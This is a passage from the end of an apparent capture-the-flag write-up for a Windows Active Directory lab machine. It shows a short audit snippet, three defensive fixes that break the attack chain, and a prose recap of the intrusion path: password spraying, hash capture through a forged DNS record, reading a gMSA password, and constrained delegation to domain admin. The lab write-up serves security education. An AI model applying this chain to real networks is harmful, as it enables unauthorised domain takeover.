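    for finding in audit(OBJECTS):
        print(*finding)
```

Closing any one of the three findings breaks the chain: removing the user group from the gMSA's readers stops the password dump, dropping the delegation to the DC leaves svc_int with nothing to delegate to, and marking Administrator as not delegatable (or adding it to Protected Users) makes the impersonation step fail even if the first two remain.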
Conclusion:
So that was “Intelligence” for you. The machine is a Windows box that showcases a number of common attacks in an Active Directory environment. After retrieving internal PDF documents stored on the web server (by brute-forcing a common naming scheme) and inspecting their contents and metadata, which reveal a default password and a list of potential AD users, we performed password spraying, which led to the discovery of a valid user account and granted us an initial foothold on the system. After that, a scheduled PowerShell script that sends authenticated requests to web servers based on their hostname was discovered. By adding a custom DNS record, it was possible to force a request that could be intercepted to capture the hash of a second user, which was easily crackable. This user was allowed to read the password of a group managed service account, which in turn has constrained delegation access to the domain controller, resulting in a shell with administrative privileges. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.